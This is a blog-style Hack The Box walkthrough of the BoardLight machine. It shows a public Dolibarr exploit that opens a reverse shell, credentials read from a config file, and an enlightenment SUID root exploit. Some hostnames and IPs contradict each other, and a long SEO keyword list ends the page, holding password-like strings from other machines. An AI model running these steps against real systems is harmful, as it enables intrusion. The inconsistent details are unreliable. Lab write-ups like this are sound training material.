BoardLight HTB Walkthrough

Welcome to another Hack the Box walkthrough. In this blog post, I have demonstrated how I owned the BoardLight machine on Hack the Box. Hack The Box is a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cyber security jobs. 

If you are new to this blog, please don’t forget to like, comment, and subscribe to my YouTube channel and follow me on LinkedIn for more HTB walkthroughs and cybersecurity related contents.

About the Machine

The BoardLight machine is an introductory-level challenge on Hack The Box (HTB). It is an easy level Linux machine that features a Dolibarr instance vulnerable to CVE-2023-30253. This vulnerability is leveraged to gain access as www-data. After enumerating and dumping the web configuration file contents, plaintext credentials lead to SSH access to the machine. Enumerating the system, a SUID binary related to enlightenment is identified which is vulnerable to privilege escalation via CVE-2022-37706 and can be abused to leverage a root shell.

These guides cover enumeration, vulnerability exploitation, and privilege escalation techniques Boardlight Walkthrough. The machine is considered very easy to root.

The first step in solving this machine is to connect the Kali Linux machine with Hack the Box server. To do this, I logged in into my HTB account and click “connect to HTB” I chose my server as EU and click on the “Download VPN” button. This downloaded a .ovpn extension file.

Once the .ovpn file has been downloaded, I created a folder on my desktop and moved it into the new folder named “BoardlightHTB”. Once the file has been moved, I opened the directory in my terminal by right-clicking and choosing the option “Open in terminal”. Once the terminal has been opened, I typed the following commands to establish a connection between my Kali Linux terminal and Hack the Box server.

sudo openvpn boardlight.ovpn

Once the connection was successful and the button "Connect to HTB" is green, the next step was starting the machine. Starting the machine automatically assign an IP of 10.10.11.11, after which I performed Nmap enumeration on the target machine IP address.

What is Nmap and how can it be used for enumeration?

Nmap is a versatile tool, often used for network enumeration, which is the process of gathering information about a network or system. It can identify device types, reverse DNS names, MAC addresses, and IP addresses of active hosts, aiding in network discovery and security auditing. Nmap can also reveal open TCP ports and exposed services, alongside operating system and version details. Furthermore, Nmap facilitates SSH enumeration, offering scripts for tasks like identifying authentication methods and detecting SSHv1 servers. The tool is fundamental in penetration testing, providing crucial insights during initial assessments.

Running the following Nmap command, it displayed all the open ports available at the target machine (10.10.11.11):

nmap -sCV -A 10.10.11.11

Afterward, I performed nmap enumeration, and found two open ports: 22/tcp and 80/tcp. The next step was performing the dns (subdomain) enumeration using either gobuster or ffuf. To perform enumeration using gobuster, I used the following command:

gobuster dns -d “boardlight.htb” -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 100

The gobuster DNS enumeration returned crm.boardlight.htb - I added this to my /etc/hosts file by running the following command:

sudo nano /etc/hosts

Another way to perform the dns (subdomain) enumeration is using ffuf, by running the following command:

ffuf -u http://boardlight.htb -H “Host:FUZZ.boardlight.htb” -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -fw 18

I found crm, therefore I am going to add it to the /etc/hosts file by running the following command:

sudo nano /etc/hosts

This will open the GNU interface and I will add the IP address 10.10.11.11 and also the domain name crm.board.htb. After I have successfully added this, I will open my FireFox browser and visit crm.board.light

The browser displayed a login page and I tried logging in with default credentials like admin as my username and admin as my password. Luckily, I was able to login into the CRM.

After I logged in, I noticed there are some certain restrictions to the type of actions that I can perform on the website as an administrator. Looking at the website login interface, I found out that the website crm.board.htb was running on Dolibarr 17.0.0, so I searched for the exploits and vulnerabilities associated with the version.

I found a GitHub repository for Dolibarr 17.0.0 CVE-2023–30253 which was a PHP Injection code vulnerability which allows malicious actors to get reverse shell by running a python file against default username and password using admin.

I clicked on the little copy icon to copy the GitHub link and then opened a new terminal inside the directory BoardLightHTB I created on my desktop and clone the GitHub repository by typing the following commands in the Linux terminal:

git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git

This will download the repository inside the BoardLightHTB directory. The next step is navigating into the Exploit-for-Dollibarr-17.0.0-CVE-2023–30253 folder and to open a terminal inside the directory to run the following commands:

python3 exploit.py http://crm.board.htb admin admin 10.10.15.1 4444

Prior to running the python code, I launched a netcat listener at port 4444 and also run the ifconfig command to find the LIPADDRESS of my Kali Linux.

After running the ifconfig command, I got 10.10.15.1 as my machine IP address. Next, I set the netcat listener to allow connection from port 4444.

After setting up the netcat listener, I ran the python command to establish a reverse shell connection to http://crm.board.htb using admin as both the username and password, and 10.10.11.11 as the listening IPADDRESS and 4444 as the listening PORT.

After getting the reverse shell, I stabilized the shell by running the following python command:

python3 -c ‘import pty;pty.spwan(“/bin/bash)’ ---> This will stabilize the reverse shell ls ---------------> This will list all the files/directories cd ~/ ---------------> This will change the directory to root ls ---------------> This will list all the files/directories cd html ---------------> This will change the directory to html

I couldn’t find anything in the root folder directory apart from the html directory. Therefore, I changed my directory to home and also locate the conf.php file by running the following commands:

cd /home cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

I found the database username and password in the conf.php file. I copied the database password to make further reference in the hacking exercise. Next, I am going to run the ssh command to obtain the shell as user larissa by typing the following command either in the previous shell or by opening a new terminal:

ssh larissa@board.htb or ssh larissa@10.10.11.11 to obtain the shell as larissa

ssh larissa@board.htb ---------------> allowed me to get the shell as larissa ls ---------------> I listed all the file/directory for user larissa cat user.txt ---------------> I read the user.txt file by typing cat user.txt

Hurry! I got my user flag. The next step is getting the root user flag, I searched for Dolibarr 17.0.0 vulnerability and found an exploit (Super User ID Vulnerability) related to this version.

To get started with the solution on getting the root flag, I used the following command to search for files with the setuid permission:

find / -type f -perm -u=s 2>/dev/null ---------------> This Linux find command is used to search for files with the setuid (SUID) permission set

Next, I read the proof of concept to better understand the vulnerability. In accordance with the vulnerability, the malicious actor will execute some certain commands.

to obtain/pop the root shell. These commands are:

mkdir -p /tmp/net mkdir -p “/dev/../tmp/;/tmp/exploit” echo “/bin/sh” > /tmp/exploit /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), “/dev/../tmp/;/tmp/exploit” /tmp///net

Next, I listed all the files/directories after obtaining the shell by running ls command. After that, I changed my directory to root by typing cd /root, then listed all the files/directories in the /root folder. There, I got my root.txt file sitting there.

To read the content of the root.txt file, I ran the following command:

cat root.txt

Hurray!! I got my root flag

If you enjoy reading my writeup and would want to get notification as soon as I make a new writeup, do not forget to subscribe to my YouTube channel and follow me on my other social media accounts. Thank you.

Subscribe to my YouTube channel: https://www.youtube.com/@BoltechTechnologies1
Follow me on LinkedIn: https://www.linkedin.com/in/isiaq-ibrahim-468588156/
Follow me on Twitter: https://x.com/Isiaq_Ibrahim99
Follow me on Twitter: https://x.com/BoltechNG
Follow me on Medium: https://medium.com/@ibrahimbolaji50.ib
Download my writeup here: https://drive.google.com/file/d/18hlkvTeOxM0YEpIgO3rzruU2qRFByDBK/view?usp=drive_link

This walkthrough was first published on Medium in August 2024, but was pulled down by Hack The Box and Medium. The reason was: I uploaded a spoiler which is in violation of the terms and agreement of Hack the Box. The walkthrough had 6 views and 3 reads on Medium and 888 views on YouTube.

Keywords:

eighteen htb writeup

eighteen htb walkthrough

eighteen htb

htb eighteen writeup

eighteen writeup

hackthebox eighteen writeup

htb eighteen walkthrough

eighteen walkthrough

eighteen writeup htb

htb eighteen

gavel htb

eighteen hack the box

eighteen hackthebox writeup

eighteen hackthebox

hack the box eighteen

gavel htb writeup

eighteen walkthrough htb

gavel writeup

htb gavel writeup

eighteen.htb writeup

hackthebox eighteen walkthrough

eighteen hack the box walkthrough

hack the box eighteen walkthrough

hackthebox eighteen

eighteen.htb

eighteen htb machine

"eighteen.htb"

eighteen write up

htb gavel walkthrough

eighteen htb write up

eighteen hackthebox walkthrough

hack the box eighteen writeup

"eighteen" hackthebox writeup

hackthebox gavel writeup

htb eighteen write up

eighteen machine htb

dc01.eighteen.htb

"eighteen" htb writeup

eighteen hack the box writeup

htb gavel

htb "eighteen" writeup

gavel hackthebox writeup

eighteen.htb walkthrough

gavel htb write up

"eighteen" htb walkthrough

htb "eighteen"

htb signed

gavel htb walkthrough

gavel.htb

"overwatch.htb"

gavel hack the box

gavel walkthrough

eighteen writeup hackthebox

signed htb

gavel writeup htb

writeup eighteen

hackthebox "eighteen"

"eighteen.htb" writeup

gavel hackthebox walkthrough

signed.htb

"giveback" htb writeup

"monitorsfour"

htb gavel sql injection payload inventory.php

htb gavel walkthrough sql injection payload inventory.php

hack the box gavel sql injection payload inventory.php

overwatch htb writeup

hack the box gavel sql injection payload inventory.php 2025

htb machine editor xwiki simplistcode pro

htb gavel walkthrough sql injection inventory.php

hack the box gavel walkthrough sql injection payload inventory.php

htb gavel walkthrough sql injection inventory.php payload

hack the box gavel walkthrough sql injection payload

htb gavel sql injection payload inventory.php sort

"gavel.htb"

nanocorp htb

hack the box gavel sql injection payload 2025

gavel.htb/admin.php

htb gavel walkthrough pdo injection sort parameter

htb gavel walkthrough sql injection payload

nanocorp walkthrough

eighteen.htb:5985

gavel 2.0 exploit

"0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133" password

gavel.htb/includes

hercules htb writeup

nanocorp htb writeup

editor htb

gavel-util

overwatch htb walkthrough

"hack the box" "eighteen" writeup

hack the box gavel walkthrough pdo injection

htb overwatch writeup

signed htb walkthrough

"eighteen" htb

hercules htb walkthrough

guardian htb writeup

hackthebox overwatch writeup

htb eighteen admin password iloveyou1

gavel.htb/rules

editor htb walkthrough

hercules htb

gavel hackthebox

nanocorp writeup

overwatch writeup htb

conversor htb walkthrough

htb monitorsfour

htb overwatch walkthrough

hackthebox hercules

"dc01.eighteen.htb"

ina2we6harj2gaw!

hackthebox "eighteen" writeup

"browsed.htb"

monitorsfour.htb:5985

overwatch.htb:5985

htb eighteen machine walkthrough

"eighteen" hack the box writeup

eighteen htb github

gavel writeup hackthebox

gavel.htb/.git

hack the box eighteen machine walkthrough

giveback walkthrough

hackthebox gavel walkthrough

hackthebox gavel

htb editor writeup

overwatch hack the box writeup

"overwatch" htb writeup

nanocorp htb walkthrough

overwatch hackthebox writeup

overwatch.htb writeup

hackthebox nanocorp writeup

overwatch writeup hackthebox

giveback htb writeup

htb nanocorp writeup

"browsed" htb writeup

htb topology writeup

htb browsed

"0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"

signed walkthrough

htb gavel write up

"giveback.htb"

htb 18

giveback htb

htb guardian writeup

hercules writeup

wiki.editor.htb

monitorsfour.htb/robots.txt

monitorsfour htb writeup

pterodactyl hack the box walkthrough

editor.htb

conversor walkthrough

htb edit

hack the box eighteen machine

giveback htb walkthrough

htb hercules writeup

pterodactyl htb walkthrough

planning htb

monitorsfour htb walkthrough

hackthebox monitorsfour

htb nanocorp

pterodactyl htb writeup

pterodactyl writeup htb

pterodactyl hackthebox walkthrough

artificial htb

hackthebox pterodactyl

pterodactyl hackthebox writeup

htb pterodactyl writeup

browsed htb writeup

hackthebox nanocorp

htb planning

browsed walkthrough

facts htb walkthrough

htb facts writeup